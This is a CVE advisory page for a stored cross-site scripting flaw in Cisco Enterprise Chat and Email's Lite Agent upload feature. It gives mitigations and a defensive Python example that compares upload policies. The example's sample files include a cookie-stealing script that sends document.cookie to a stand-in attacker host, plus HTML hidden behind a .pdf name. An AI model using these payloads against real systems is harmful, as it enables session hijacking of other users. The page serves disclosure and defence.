CVE-2026-20172
Status: Received - Intake
Stored XSS in Cisco Enterprise Chat and Email Lite Agent

Publication date: 2026-05-06

Last updated on: 2026-05-06

Assigner: Cisco Systems, Inc.

Description
A vulnerability in the Lite Agent feature of Cisco Enterprise Chat and Email (ECE) could allow an authenticated, remote attacker to conduct browser-based attacks. To exploit this vulnerability, the attacker must have valid credentials for a user account with at least the role of Agent. This vulnerability is due to inadequate validation of file contents during file upload operations. An attacker could exploit this vulnerability by uploading a file that contains malicious scripts or HTML code, which the application could make available to other users to access. A successful exploit could allow the attacker to execute the contents of that file in the browser of a user and conduct browser-based attacks. 
Meta Information
Published: 2026-05-06
Last Modified: 2026-05-06
Generated: 2026-06-16
AI Q&A: 2026-05-06
EPSS Evaluated: 2026-06-15
External references: NVD, EUVD
Affected Vendors & Products (1 associated CPE)
Vendor: cisco
Product: enterprise_chat_and_email
Version / Range: * (the CPE carries no version bound; the page records no fixed release)
Exploitability
KEV: not listed on this page.
CWE
CWE-646 (Reliance on File Name or Extension of Externally-Supplied File): The product allows a file to be uploaded, but it relies on the file name or extension of the file to determine the appropriate behaviors. This could be used by attackers to cause the file to be misclassified and processed in a dangerous fashion. In this case the upload decision is driven by the name or extension rather than the bytes, so an HTML or script body behind an acceptable-looking name is stored and later served to other users.
Executive Summary

This vulnerability exists in the Lite Agent feature of Cisco Enterprise Chat and Email (ECE). It allows an authenticated remote attacker holding valid credentials for an account with at least the Agent role to conduct browser-based attacks against other users of the application.

The root cause is inadequate validation of file contents during upload: the application accepts a file whose body is HTML or script as long as the upload itself is permitted. Because the stored file is later made available to other users, the malicious content runs in their browsers, in the application's origin, when they open it. This is a stored (persistent) cross-site scripting condition.

Impact Analysis

If exploited, this vulnerability allows an attacker to execute script in the browsers of users who open the uploaded file. Script running in the application's origin can perform actions with the victim's privileges, read what the victim's session can read, and tamper with data the victim can modify. The attacker needs only an Agent-level account, so the realistic victims are other agents and supervisors who handle the same chats and emails.

Mitigation Strategies

Apply the fix Cisco publishes for this advisory; this page does not record a fixed release, so check the Cisco advisory for the versions that resolve it. Restricting uploads to accounts with the Agent role is not a mitigation, because that is exactly the privilege the attacker already holds. Until the fix is applied, reduce exposure by (a) validating uploaded files by content, not by name or extension (require the bytes to match an allowlisted type's signature, and reject text uploads that contain markup), (b) serving stored uploads with Content-Disposition: attachment, X-Content-Type-Options: nosniff and a server-chosen Content-Type rather than the client's claimed type, ideally from a separate origin so that any rendered content cannot reach the application's session, and (c) monitoring upload activity and reviewing Agent accounts, since every Agent is a potential attacker here.
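The contrast between extension-based and content-based upload handling described in this page, as an added example that is not Cisco's code and makes no claim about how ECE's upload path is implemented. All names (vulnerable_policy, hardened_policy, the allowlist and the sample files) are hypothetical; the sample uploads are constructed inline. The CWE-646 shape is the policy that looks only at the name; the hardened policy checks the bytes against the claimed type and fixes the headers the file will be served with.

```python
import re
from dataclasses import dataclass, field

# Constructed sample uploads (hypothetical content, not from any real incident):
# claimed filename -> bytes the client actually sent.
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
SAMPLES = {
    "real.png": PNG_MAGIC + b"\x00\x00\x00\rIHDR" + b"\x00" * 13,
    # HTML behind an allowed extension: with no content check it is stored as-is,
    # and a browser that renders it runs the script in the application's origin.
    "report.pdf": b"<html><body><script>fetch('/api/session')</script></body></html>",
    # Allowed text extension carrying markup that must never be executed.
    "notes.txt": b"<script>location='https://attacker.example/?'+document.cookie</script>",
    "hello.txt": b"plain text, nothing to execute",
}

# extension -> (Content-Type the server will send, required leading bytes)
ALLOWED = {
    "png": ("image/png", PNG_MAGIC),
    "jpg": ("image/jpeg", b"\xff\xd8\xff"),
    "pdf": ("application/pdf", b"%PDF-"),
    "txt": ("text/plain; charset=utf-8", None),  # no signature; see ACTIVE_MARKUP
}

# Markup a browser could treat as active content if the file were rendered inline.
ACTIVE_MARKUP = re.compile(rb"<\s*(script|html|svg|iframe|object|embed|meta)\b|javascript:", re.I)


def _extension(filename: str) -> str:
    return filename.rsplit(".", 1)[-1].lower() if "." in filename else ""


def vulnerable_policy(filename: str, data: bytes) -> bool:
    """CWE-646 shape: the decision depends on the name alone; `data` is never read."""
    return _extension(filename) in ALLOWED


@dataclass
class Verdict:
    accepted: bool
    reason: str
    headers: dict = field(default_factory=dict)


def hardened_policy(filename: str, data: bytes) -> Verdict:
    """Check the bytes against the claimed type and pin how the file will be served."""
    ext = _extension(filename)
    if ext not in ALLOWED:
        return Verdict(False, f"extension {ext!r} not in allowlist")
    content_type, magic = ALLOWED[ext]
    if magic is not None and not data.startswith(magic):
        return Verdict(False, f"bytes do not match the {ext} signature")
    if magic is None and ACTIVE_MARKUP.search(data):
        return Verdict(False, "text upload contains active markup")
    safe_name = re.sub(r"[^A-Za-z0-9._-]", "_", filename)[:100]
    headers = {
        # Content-Type comes from the allowlist, never from the client's claim.
        "Content-Type": content_type,
        # Download, do not render: the file is never a document in the app's origin.
        "Content-Disposition": f'attachment; filename="{safe_name}"',
        # Stop browsers from sniffing the body into text/html.
        "X-Content-Type-Options": "nosniff",
        # Defence in depth if something does render it inline anyway.
        "Content-Security-Policy": "sandbox; default-src 'none'",
    }
    return Verdict(True, "accepted", headers)


def compare(samples: dict) -> dict:
    """name -> (extension-only accepts, content-aware accepts, content-aware reason)."""
    out = {}
    for name, data in samples.items():
        v = hardened_policy(name, data)
        out[name] = (vulnerable_policy(name, data), v.accepted, v.reason)
    return out


if __name__ == "__main__":
    for name, (weak, strong, why) in compare(SAMPLES).items():
        print(f"{name:12} extension-only: {'accept' if weak else 'reject':7} "
              f"content-aware: {'accept' if strong else 'reject':7} ({why})")
```

Running it shows the extension-only policy accepting all four samples, including the HTML body named report.pdf and the script inside notes.txt, while the content-aware policy rejects both and accepts only the genuine PNG and the plain text file. The headers matter even for accepted files: a text/plain body served with nosniff and as an attachment is inert in the browser, which is the property the vulnerable behaviour in this advisory lacks.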
